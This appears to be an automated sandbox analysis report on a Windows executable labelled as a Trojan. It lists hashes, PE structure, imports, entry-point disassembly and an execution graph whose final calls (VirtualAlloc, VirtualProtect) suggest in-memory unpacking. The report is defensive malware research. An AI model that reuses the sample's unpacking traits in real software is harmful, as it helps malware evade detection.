          No simulations
          No context
          No context
          No context
          No context
          No context
          No created / dropped files found
          File type:PE32 executable (GUI) Intel 80386, for MS Windows
          Entropy (8bit):5.893929069389445
          TrID:
          • Win32 Executable (generic) a (10002005/4) 99.96%
          • Generic Win/DOS Executable (2004/3) 0.02%
          • DOS Executable Generic (2002/1) 0.02%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe
          File size:182'272 bytes
          MD5:6d36580feee622f41b2ab6bfe79a8f5e
          SHA1:93e1cf1bb9ffa2d921d0402e6113ce50e6ed3bd7
          SHA256:3aa50555913747e4d6c5be45de96d771efea5f59251fd25a7746c0defcf12ba8
          SHA512:9c140cb14fd933f8f9d84d2331b6efbf99c1550a624e7cb26ab85b678d0f8b320fbad8a64e35a40111e10fa30c26f52439c06db59337b19a4df18f368d38117f
          SSDEEP:3072:TCmlA+2TGMF85+bkRG32foUP9GmPe97UoVmjbhw/KwAHdMZ6nulkS3zeNZ:WmlV4h8JG3QUzon2iwlkszeNZ
          TLSH:FC047D01F6C1C031F1753A328AA6D0E1763EF9307BD95DDB2B5D0C9E0A642C69B279A7
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........`J...$R..$R..$R.j'S..$R.j!SE.$R.j S..$RHz S..$RHz'S..$RHz!S..$R.j%S..$R..%R..$REz-S..$REz.R..$R...R..$REz&S..$RRich..$R.......
          Icon Hash:90cececece8e8eb0
          Entrypoint:0x403d44
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Time Stamp:0x65D59C0C [Wed Feb 21 06:45:32 2024 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:6
          OS Version Minor:0
          File Version Major:6
          File Version Minor:0
          Subsystem Version Major:6
          Subsystem Version Minor:0
          Import Hash:66deda4204cb009d8c01c3f28c17567f
          Instruction
          call 00007FB510B397BCh
          jmp 00007FB510B3922Fh
          push ebp
          mov ebp, esp
          push 00000000h
          call dword ptr [0041105Ch]
          push dword ptr [ebp+08h]
          call dword ptr [00411058h]
          push C0000409h
          call dword ptr [0041100Ch]
          push eax
          call dword ptr [00411014h]
          pop ebp
          ret
          push ebp
          mov ebp, esp
          sub esp, 00000324h
          push 00000017h
          call dword ptr [00411060h]
          test eax, eax
          je 00007FB510B393B7h
          push 00000002h
          pop ecx
          int 29h
          mov dword ptr [00418A78h], eax
          mov dword ptr [00418A74h], ecx
          mov dword ptr [00418A70h], edx
          mov dword ptr [00418A6Ch], ebx
          mov dword ptr [00418A68h], esi
          mov dword ptr [00418A64h], edi
          mov word ptr [00418A90h], ss
          mov word ptr [00418A84h], cs
          mov word ptr [00418A60h], ds
          mov word ptr [00418A5Ch], es
          mov word ptr [00418A58h], fs
          mov word ptr [00418A54h], gs
          pushfd
          pop dword ptr [00418A88h]
          mov eax, dword ptr [ebp+00h]
          mov dword ptr [00418A7Ch], eax
          mov eax, dword ptr [ebp+04h]
          mov dword ptr [00418A80h], eax
          lea eax, dword ptr [ebp+08h]
          mov dword ptr [00418A8Ch], eax
          mov eax, dword ptr [ebp-00000324h]
          mov dword ptr [004189C8h], 00010001h
          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IMPORT0x176900x3c.rdata
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1a0000x13c40.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e0000x1130.reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG0x166980x38.rdata
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x165d80x40.rdata
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x110000x120.rdata
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x10000xfbea0xfc00f80c6e36c0496492e658927e9cbd2f9aFalse0.5602368551587301data6.555752738036374IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .rdata0x110000x6d0c0x6e0006a44f2522af6deb8eae500514137c22False0.4388494318181818OpenPGP Public Key4.883697607623019IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .data0x180000x163c0xa00b55402247df1a6c6692e0c2bccb8e505False0.1765625data2.3846615292625706IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .rsrc0x1a0000x13c400x13e00e39abfeefcd8de461783de132656f586False0.5046924135220126data4.887254345357395IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .reloc0x2e0000x11300x12006250f4910a879ac182f4b8379731bb76False0.7437065972222222data6.405937874038831IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
          NameRVASizeTypeLanguageCountryZLIB Complexity
          RT_DIALOG0x1a1180x18cdataEnglishUnited States0.6464646464646465
          RT_RCDATA0x1a2a40x19dataEnglishUnited States1.36
          RT_RCDATA0x1a2c00x13800dataEnglishUnited States0.5062600160256411
          RT_MANIFEST0x2dac00x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
          DLLImport
          KERNEL32.dllVirtualFree, GetCurrentProcess, VirtualAlloc, TerminateProcess, GetModuleHandleA, GetLastError, GetProcAddress, ExitProcess, VirtualProtect, BuildCommDCBAndTimeoutsA, WriteConsoleW, CloseHandle, CreateFileW, SetFilePointerEx, GetConsoleMode, GetConsoleOutputCP, FlushFileBuffers, HeapReAlloc, HeapSize, GetModuleHandleW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, GetModuleHandleExW, HeapFree, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, LCMapStringW, GetProcessHeap, DecodePointer
          GDI32.dllLPtoDP
          Language of compilation systemCountry where language is spokenMap
          EnglishUnited States
          No network behavior found

          Click to jump to process

          Click to jump to process

          Click to dive into process behavior distribution

          Target ID:0
          Start time:19:29:56
          Start date:19/04/2024
          Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe"
          Imagebase:0x8f0000
          File size:182'272 bytes
          MD5 hash:6D36580FEEE622F41B2AB6BFE79A8F5E
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:true

          Reset < >

            Execution Graph

            Execution Coverage:7.6%
            Dynamic/Decrypted Code Coverage:17.5%
            Signature Coverage:17.1%
            Total number of Nodes:1248
            Total number of Limit Nodes:10
            execution_graph 10402 8f3bc8 10403 8f3bd4 ___scrt_is_nonwritable_in_current_image 10402->10403 10428 8f3f25 10403->10428 10405 8f3bdb 10406 8f3d2e 10405->10406 10414 8f3c05 ___scrt_is_nonwritable_in_current_image _unexpected ___scrt_release_startup_lock 10405->10414 10471 8f421c IsProcessorFeaturePresent 10406->10471 10408 8f3d35 10475 8f76e3 10408->10475 10413 8f3c24 10414->10413 10418 8f3ca5 10414->10418 10454 8f76bd 10414->10454 10416 8f3cab 10440 8f2f40 10416->10440 10436 8f4337 10418->10436 10423 8f3ccb 10424 8f3cd4 10423->10424 10462 8f7698 10423->10462 10465 8f4099 10424->10465 10429 8f3f2e 10428->10429 10481 8f44c5 IsProcessorFeaturePresent 10429->10481 10433 8f3f3f 10434 8f3f43 10433->10434 10491 8f4ecd 10433->10491 10434->10405 10551 8f4f20 10436->10551 10439 8f435d 10439->10416 10553 8f2ae0 10440->10553 10443 8f2f8c ExitProcess 10444 8f2f81 GetLastError 10444->10443 10445 8f2f94 BuildCommDCBAndTimeoutsA 10444->10445 10446 8f2fa7 GetCurrentProcess TerminateProcess 10445->10446 10447 8f2fb6 10445->10447 10446->10447 10625 8f1710 10447->10625 10453 8f2fe0 10460 8f436d GetModuleHandleW 10453->10460 10455 8f76d3 ___scrt_is_nonwritable_in_current_image __dosmaperr 10454->10455 10455->10418 11056 8f832a GetLastError 10455->11056 10461 8f3cc7 10460->10461 10461->10408 10461->10423 11605 8f753e 10462->11605 10466 8f40a5 10465->10466 10467 8f3cdc 10466->10467 11675 8f7cfb 10466->11675 10467->10413 10469 8f40b3 10470 8f4ecd ___scrt_uninitialize_crt 7 API calls 10469->10470 10470->10467 10472 8f4232 _unexpected 10471->10472 10473 8f42dd IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10472->10473 10474 8f4328 _unexpected 10473->10474 10474->10408 10476 8f753e _unexpected 23 API calls 10475->10476 10477 8f3d3b 10476->10477 10478 8f76a7 10477->10478 10479 8f753e _unexpected 23 API calls 10478->10479 10480 8f3d43 10479->10480 10482 8f3f3a 10481->10482 10483 8f4eae 10482->10483 10497 8f60a7 10483->10497 10486 8f4eb7 10486->10433 10488 8f4ebf 10489 8f4eca 10488->10489 10511 8f60e3 10488->10511 10489->10433 10492 8f4ed6 10491->10492 10493 8f4ee0 10491->10493 10494 8f5169 ___vcrt_uninitialize_ptd 6 API calls 10492->10494 10493->10434 10495 8f4edb 10494->10495 10496 8f60e3 ___vcrt_uninitialize_locks DeleteCriticalSection 10495->10496 10496->10493 10498 8f60b0 10497->10498 10500 8f60d9 10498->10500 10501 8f4eb3 10498->10501 10515 8f62ec 10498->10515 10502 8f60e3 ___vcrt_uninitialize_locks DeleteCriticalSection 10500->10502 10501->10486 10503 8f5136 10501->10503 10502->10501 10532 8f61fd 10503->10532 10508 8f5166 10508->10488 10510 8f514b 10510->10488 10512 8f610d 10511->10512 10513 8f60ee 10511->10513 10512->10486 10514 8f60f8 DeleteCriticalSection 10513->10514 10514->10512 10514->10514 10520 8f6112 10515->10520 10518 8f6324 InitializeCriticalSectionAndSpinCount 10519 8f630f 10518->10519 10519->10498 10521 8f612f 10520->10521 10524 8f6133 10520->10524 10521->10518 10521->10519 10522 8f619b GetProcAddress 10522->10521 10524->10521 10524->10522 10525 8f618c 10524->10525 10527 8f61b2 LoadLibraryExW 10524->10527 10525->10522 10526 8f6194 FreeLibrary 10525->10526 10526->10522 10528 8f61f9 10527->10528 10529 8f61c9 GetLastError 10527->10529 10528->10524 10529->10528 10530 8f61d4 10529->10530 10530->10528 10531 8f61ea LoadLibraryExW 10530->10531 10531->10524 10533 8f6112 ___vcrt_FlsFree 5 API calls 10532->10533 10534 8f6217 10533->10534 10535 8f6230 TlsAlloc 10534->10535 10536 8f5140 10534->10536 10536->10510 10537 8f62ae 10536->10537 10538 8f6112 ___vcrt_FlsFree 5 API calls 10537->10538 10539 8f62c8 10538->10539 10540 8f62e3 TlsSetValue 10539->10540 10541 8f5159 10539->10541 10540->10541 10541->10508 10542 8f5169 10541->10542 10543 8f5173 10542->10543 10544 8f5179 10542->10544 10546 8f6238 10543->10546 10544->10510 10547 8f6112 ___vcrt_FlsFree 5 API calls 10546->10547 10548 8f6252 10547->10548 10549 8f626a TlsFree 10548->10549 10550 8f625e 10548->10550 10549->10550 10550->10544 10552 8f434a GetStartupInfoW 10551->10552 10552->10439 10554 8f2b16 10553->10554 10656 8f3040 10554->10656 10559 8f3040 27 API calls 10560 8f2bb9 10559->10560 10681 8f2870 10560->10681 10563 8f3040 27 API calls 10564 8f2c1c 10563->10564 10684 8f28a0 10564->10684 10569 8f3040 27 API calls 10570 8f2c5c 10569->10570 10571 8f3040 27 API calls 10570->10571 10572 8f2c75 10571->10572 10704 8f2a60 10572->10704 10576 8f2c9b 10577 8f3040 27 API calls 10576->10577 10578 8f2cd2 10577->10578 10579 8f3040 27 API calls 10578->10579 10580 8f2d05 10579->10580 10714 8f2450 10580->10714 10583 8f3040 27 API calls 10584 8f2d23 10583->10584 10733 8f2540 10584->10733 10591 8f3040 27 API calls 10592 8f2d7b 10591->10592 10593 8f3040 27 API calls 10592->10593 10594 8f2d94 10593->10594 10595 8f3040 27 API calls 10594->10595 10596 8f2dad 10595->10596 10780 8f1e90 10596->10780 10599 8f3040 27 API calls 10600 8f2df2 10599->10600 10601 8f3040 27 API calls 10600->10601 10602 8f2e1b 10601->10602 10809 8f1ff0 10602->10809 10605 8f3040 27 API calls 10606 8f2e40 10605->10606 10820 8f2090 10606->10820 10609 8f3020 task 25 API calls 10610 8f2e5d 10609->10610 10611 8f3040 27 API calls 10610->10611 10612 8f2e6f 10611->10612 10613 8f3040 27 API calls 10612->10613 10614 8f2e88 10613->10614 10615 8f3040 27 API calls 10614->10615 10616 8f2ea1 10615->10616 10617 8f3040 27 API calls 10616->10617 10618 8f2eba 10617->10618 10619 8f3040 27 API calls 10618->10619 10620 8f2ed9 10619->10620 10621 8f3020 task 25 API calls 10620->10621 10622 8f2f01 10621->10622 10825 8f21a0 10622->10825 11035 8f1110 GetModuleHandleA 10625->11035 10627 8f173c 10628 8f1110 17 API calls 10627->10628 10632 8f1750 10628->10632 10629 8f183c 10630 8f6940 ___std_exception_copy 14 API calls 10629->10630 10631 8f1848 10630->10631 10633 8f3a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10631->10633 10632->10629 10634 8f6b68 ___std_exception_copy 15 API calls 10632->10634 10635 8f1855 10633->10635 10636 8f178f 10634->10636 10642 8f2ff0 10635->10642 11041 8f1300 GetModuleHandleA VirtualAlloc 10636->11041 10639 8f6940 ___std_exception_copy 14 API calls 10640 8f1830 10639->10640 10641 8f6940 ___std_exception_copy 14 API calls 10640->10641 10641->10629 10643 8f3020 task 25 API calls 10642->10643 10644 8f3002 10643->10644 10645 8f3020 task 25 API calls 10644->10645 10646 8f300d 10645->10646 10647 8f3020 task 25 API calls 10646->10647 10648 8f2fd0 10647->10648 10649 8f3a94 10648->10649 10650 8f3a9d IsProcessorFeaturePresent 10649->10650 10651 8f3a9c 10649->10651 10653 8f3d8b 10650->10653 10651->10453 11055 8f3d4e SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10653->11055 10655 8f3e6e 10655->10453 10657 8f3075 operator!= char_traits 10656->10657 10860 8f3440 10657->10860 10660 8f26f0 10661 8f3040 27 API calls 10660->10661 10662 8f2753 10661->10662 10663 8f3040 27 API calls 10662->10663 10664 8f2779 10663->10664 10665 8f3040 27 API calls 10664->10665 10666 8f2791 10665->10666 10667 8f3040 27 API calls 10666->10667 10668 8f27ae operator!= 10667->10668 10669 8f3020 task 25 API calls 10668->10669 10670 8f27cf 10669->10670 10671 8f3020 task 25 API calls 10670->10671 10672 8f27de 10671->10672 10673 8f3020 task 25 API calls 10672->10673 10674 8f282e 10673->10674 10675 8f3020 task 25 API calls 10674->10675 10676 8f283a 10675->10676 10677 8f3020 task 25 API calls 10676->10677 10678 8f2849 10677->10678 10679 8f3a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10678->10679 10680 8f285e 10679->10680 10680->10559 10682 8f3020 task 25 API calls 10681->10682 10683 8f288e 10682->10683 10683->10563 10685 8f3040 27 API calls 10684->10685 10686 8f28e6 10685->10686 10687 8f3040 27 API calls 10686->10687 10689 8f290f 10687->10689 10688 8f3020 task 25 API calls 10690 8f29b7 10688->10690 10689->10688 10691 8f3020 task 25 API calls 10690->10691 10692 8f29c3 10691->10692 10693 8f3020 task 25 API calls 10692->10693 10694 8f29d2 10693->10694 10695 8f3a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10694->10695 10696 8f29e7 10695->10696 10697 8f29f0 10696->10697 10698 8f3040 27 API calls 10697->10698 10699 8f2a14 10698->10699 10700 8f3020 task 25 API calls 10699->10700 10701 8f2a48 10700->10701 10702 8f3a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10701->10702 10703 8f2a52 10702->10703 10703->10569 10705 8f3040 27 API calls 10704->10705 10706 8f2aa3 10705->10706 10707 8f3020 task 25 API calls 10706->10707 10708 8f2ab8 10707->10708 10709 8f3020 task 25 API calls 10708->10709 10710 8f2ac7 10709->10710 10711 8f3020 10710->10711 11020 8f3160 10711->11020 10713 8f302f task 10713->10576 10715 8f3040 27 API calls 10714->10715 10716 8f248f 10715->10716 10717 8f3040 27 API calls 10716->10717 10718 8f24ad 10717->10718 10719 8f3040 27 API calls 10718->10719 10720 8f24dc 10719->10720 10721 8f3020 task 25 API calls 10720->10721 10722 8f24eb 10721->10722 10723 8f3020 task 25 API calls 10722->10723 10724 8f24f7 10723->10724 10725 8f3020 task 25 API calls 10724->10725 10726 8f2503 10725->10726 10727 8f3020 task 25 API calls 10726->10727 10728 8f250f 10727->10728 10729 8f3020 task 25 API calls 10728->10729 10730 8f251e 10729->10730 10731 8f3a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10730->10731 10732 8f2536 10731->10732 10732->10583 10734 8f3040 27 API calls 10733->10734 10736 8f258f 10734->10736 10735 8f3040 27 API calls 10737 8f25e1 10735->10737 10736->10735 10738 8f3040 27 API calls 10737->10738 10739 8f25fb operator!= 10738->10739 10740 8f3020 task 25 API calls 10739->10740 10741 8f2619 10740->10741 10742 8f3020 task 25 API calls 10741->10742 10743 8f2628 10742->10743 10744 8f3020 task 25 API calls 10743->10744 10745 8f26c2 10744->10745 10746 8f3020 task 25 API calls 10745->10746 10747 8f26d1 10746->10747 10748 8f3a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10747->10748 10749 8f26e6 10748->10749 10750 8f1bd0 10749->10750 10751 8f3040 27 API calls 10750->10751 10752 8f1c15 10751->10752 10753 8f3040 27 API calls 10752->10753 10754 8f1c30 10753->10754 10755 8f3040 27 API calls 10754->10755 10756 8f1c4a operator!= 10755->10756 10757 8f3020 task 25 API calls 10756->10757 10758 8f1c68 10757->10758 10759 8f3020 task 25 API calls 10758->10759 10760 8f1c77 10759->10760 10761 8f3020 task 25 API calls 10760->10761 10762 8f1d14 10761->10762 10763 8f3a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10762->10763 10764 8f1d29 10763->10764 10765 8f1d30 10764->10765 10766 8f3040 27 API calls 10765->10766 10767 8f1d68 10766->10767 10768 8f3040 27 API calls 10767->10768 10769 8f1d94 10768->10769 10770 8f3040 27 API calls 10769->10770 10771 8f1dae operator!= 10770->10771 10772 8f3020 task 25 API calls 10771->10772 10773 8f1dcc 10772->10773 10774 8f3020 task 25 API calls 10773->10774 10776 8f1ddb 10774->10776 10775 8f3020 task 25 API calls 10777 8f1e73 10775->10777 10776->10775 10778 8f3a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10777->10778 10779 8f1e88 10778->10779 10779->10591 10781 8f3040 27 API calls 10780->10781 10782 8f1ed2 10781->10782 10783 8f3040 27 API calls 10782->10783 10784 8f1eea 10783->10784 10785 8f3040 27 API calls 10784->10785 10786 8f1f03 10785->10786 10787 8f3040 27 API calls 10786->10787 10788 8f1f17 10787->10788 10789 8f3040 27 API calls 10788->10789 10790 8f1f34 operator!= 10789->10790 10791 8f3020 task 25 API calls 10790->10791 10792 8f1f55 10791->10792 10793 8f3020 task 25 API calls 10792->10793 10795 8f1f64 10793->10795 10794 8f3020 task 25 API calls 10796 8f1f94 10794->10796 10795->10794 10797 8f3020 task 25 API calls 10796->10797 10798 8f1fa0 10797->10798 10799 8f3020 task 25 API calls 10798->10799 10800 8f1fac 10799->10800 10801 8f3020 task 25 API calls 10800->10801 10802 8f1fb8 10801->10802 10803 8f3020 task 25 API calls 10802->10803 10804 8f1fc4 10803->10804 10805 8f3020 task 25 API calls 10804->10805 10806 8f1fd3 10805->10806 10807 8f3a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10806->10807 10808 8f1fe8 10807->10808 10808->10599 10810 8f3040 27 API calls 10809->10810 10811 8f2036 10810->10811 10812 8f3020 task 25 API calls 10811->10812 10813 8f204f 10812->10813 10814 8f3020 task 25 API calls 10813->10814 10815 8f205b 10814->10815 10816 8f3020 task 25 API calls 10815->10816 10817 8f206a 10816->10817 10818 8f3a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10817->10818 10819 8f2082 10818->10819 10819->10605 10821 8f3040 27 API calls 10820->10821 10822 8f20d3 10821->10822 10823 8f3020 task 25 API calls 10822->10823 10824 8f20eb 10823->10824 10824->10609 10826 8f3040 27 API calls 10825->10826 10827 8f21de 10826->10827 10828 8f3040 27 API calls 10827->10828 10829 8f21f2 10828->10829 10830 8f3040 27 API calls 10829->10830 10831 8f2203 10830->10831 10832 8f3040 27 API calls 10831->10832 10833 8f2214 10832->10833 10834 8f3040 27 API calls 10833->10834 10835 8f225a 10834->10835 10836 8f3040 27 API calls 10835->10836 10837 8f2280 operator!= 10836->10837 10838 8f3020 task 25 API calls 10837->10838 10839 8f22aa 10838->10839 10840 8f3020 task 25 API calls 10839->10840 10842 8f22b9 10840->10842 10841 8f3040 27 API calls 10843 8f235e 10841->10843 10842->10841 10844 8f3040 27 API calls 10843->10844 10845 8f2384 operator!= 10844->10845 10846 8f3020 task 25 API calls 10845->10846 10847 8f23ae 10846->10847 10848 8f3020 task 25 API calls 10847->10848 10851 8f23bd 10848->10851 10849 8f3020 task 25 API calls 10850 8f2403 10849->10850 10852 8f3020 task 25 API calls 10850->10852 10851->10849 10853 8f240f 10852->10853 10854 8f3020 task 25 API calls 10853->10854 10855 8f241b 10854->10855 10856 8f3020 task 25 API calls 10855->10856 10857 8f242a 10856->10857 10858 8f3a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10857->10858 10859 8f2445 LPtoDP 10858->10859 10859->10443 10859->10444 10871 8f3680 10860->10871 10864 8f3465 task 10870 8f34ab task operator!= 10864->10870 10878 8f3610 10864->10878 10868 8f3a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10869 8f2b68 10868->10869 10869->10660 10870->10868 10872 8f369b _Min_value task _Max_value 10871->10872 10873 8f3a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10872->10873 10874 8f345b 10873->10874 10874->10864 10875 8f1bc0 10874->10875 10887 8f3a74 10875->10887 10879 8f3680 5 API calls 10878->10879 10880 8f361f 10879->10880 10930 8f3790 10880->10930 10883 8f3730 10884 8f3740 allocator 10883->10884 10934 8f38a0 10884->10934 10892 8f39fc 10887->10892 10891 8f3a93 10898 8f39ac 10892->10898 10895 8f4c96 10896 8f4cdd RaiseException 10895->10896 10897 8f4cb0 10895->10897 10896->10891 10897->10896 10901 8f4a5b 10898->10901 10902 8f4a68 10901->10902 10908 8f39d8 10901->10908 10902->10908 10909 8f6b68 10902->10909 10905 8f4a95 10927 8f6940 10905->10927 10908->10895 10910 8f857c 10909->10910 10911 8f85ba 10910->10911 10913 8f85a5 HeapAlloc 10910->10913 10916 8f858e __dosmaperr 10910->10916 10912 8f881d __dosmaperr 14 API calls 10911->10912 10915 8f4a85 10912->10915 10914 8f85b8 10913->10914 10913->10916 10914->10915 10915->10905 10918 8f7e0a 10915->10918 10916->10911 10916->10913 10917 8f6b82 _Allocate EnterCriticalSection LeaveCriticalSection 10916->10917 10917->10916 10919 8f7e25 10918->10919 10920 8f7e17 10918->10920 10921 8f881d __dosmaperr 14 API calls 10919->10921 10920->10919 10925 8f7e3c 10920->10925 10922 8f7e2d 10921->10922 10923 8f6b07 ___std_exception_copy 25 API calls 10922->10923 10924 8f7e37 10923->10924 10924->10905 10925->10924 10926 8f881d __dosmaperr 14 API calls 10925->10926 10926->10922 10928 8f7fb2 _free 14 API calls 10927->10928 10929 8f6958 10928->10929 10929->10908 10932 8f37b1 _Max_value 10930->10932 10931 8f3a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10933 8f350c 10931->10933 10932->10931 10933->10883 10935 8f38ac 10934->10935 10936 8f38ba 10934->10936 10940 8f3930 10935->10940 10939 8f3749 10936->10939 10948 8f1b00 10936->10948 10939->10870 10941 8f394c 10940->10941 10942 8f3947 10940->10942 10944 8f1b00 _Allocate 16 API calls 10941->10944 10951 8f1a80 10942->10951 10945 8f3955 10944->10945 10947 8f3970 10945->10947 10955 8f6b17 10945->10955 10947->10939 11001 8f3aa2 10948->11001 10952 8f1a8e stdext::threads::lock_error::lock_error 10951->10952 10953 8f4c96 std::_Xinvalid_argument RaiseException 10952->10953 10954 8f1a9c 10953->10954 10954->10941 10960 8f6aa3 10955->10960 10957 8f6b26 10968 8f6b34 IsProcessorFeaturePresent 10957->10968 10959 8f6b33 10972 8f8481 GetLastError 10960->10972 10962 8f6aae 10963 8f6b34 _Allocate 11 API calls 10962->10963 10966 8f6abc 10962->10966 10964 8f6b06 10963->10964 10965 8f6aa3 ___std_exception_copy 25 API calls 10964->10965 10967 8f6b13 10965->10967 10966->10957 10967->10957 10969 8f6b40 10968->10969 10995 8f695b 10969->10995 10973 8f8498 10972->10973 10974 8f849e 10972->10974 10975 8fa61d __dosmaperr 6 API calls 10973->10975 10976 8fa65c __dosmaperr 6 API calls 10974->10976 10992 8f84a4 SetLastError 10974->10992 10975->10974 10977 8f84bc 10976->10977 10978 8f8830 __dosmaperr 12 API calls 10977->10978 10977->10992 10980 8f84cc 10978->10980 10981 8f84eb 10980->10981 10982 8f84d4 10980->10982 10983 8fa65c __dosmaperr 6 API calls 10981->10983 10984 8fa65c __dosmaperr 6 API calls 10982->10984 10985 8f84f7 10983->10985 10986 8f84e2 10984->10986 10987 8f850c 10985->10987 10988 8f84fb 10985->10988 10989 8f7fb2 _free 12 API calls 10986->10989 10991 8f8158 __dosmaperr 12 API calls 10987->10991 10990 8fa65c __dosmaperr 6 API calls 10988->10990 10989->10992 10990->10986 10993 8f8517 10991->10993 10992->10962 10994 8f7fb2 _free 12 API calls 10993->10994 10994->10992 10996 8f6977 _unexpected 10995->10996 10997 8f69a3 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10996->10997 10998 8f6a74 _unexpected 10997->10998 10999 8f3a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10998->10999 11000 8f6a92 GetCurrentProcess TerminateProcess 10999->11000 11000->10959 11003 8f3aa7 11001->11003 11002 8f6b68 ___std_exception_copy 15 API calls 11002->11003 11003->11002 11004 8f1b0c 11003->11004 11007 8f3ac3 _Allocate 11003->11007 11011 8f6b82 11003->11011 11004->10939 11006 8f3e8c stdext::threads::lock_error::lock_error 11008 8f4c96 std::_Xinvalid_argument RaiseException 11006->11008 11007->11006 11009 8f4c96 std::_Xinvalid_argument RaiseException 11007->11009 11010 8f3ea9 11008->11010 11009->11006 11014 8f6baf 11011->11014 11015 8f6bbb ___scrt_is_nonwritable_in_current_image 11014->11015 11016 8f860b _unexpected EnterCriticalSection 11015->11016 11017 8f6bc6 11016->11017 11018 8f6c02 _Allocate LeaveCriticalSection 11017->11018 11019 8f6b8d 11018->11019 11019->11003 11021 8f3196 task 11020->11021 11022 8f31da task 11021->11022 11024 8f3360 11021->11024 11022->10713 11027 8f35b0 11024->11027 11026 8f3374 11026->11022 11028 8f35db 11027->11028 11030 8f35e8 _MallocaArrayHolder 11027->11030 11031 8f1b20 11028->11031 11030->11026 11033 8f1b5e 11031->11033 11032 8f6b17 _Allocate 25 API calls 11032->11033 11033->11032 11034 8f1b79 11033->11034 11034->11030 11036 8f1132 11035->11036 11037 8f115a GetModuleHandleW 11036->11037 11038 8f117f 11037->11038 11039 8f6b68 ___std_exception_copy 15 API calls 11038->11039 11040 8f11ad __InternalCxxFrameHandler 11038->11040 11039->11040 11040->10627 11049 8f1359 __InternalCxxFrameHandler 11041->11049 11051 8f1352 11041->11051 11042 8f3a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 11043 8f16b0 GetPEB GetUserDefaultLangID 11042->11043 11043->10639 11044 8f14ef 11045 8f1508 VirtualProtect 11044->11045 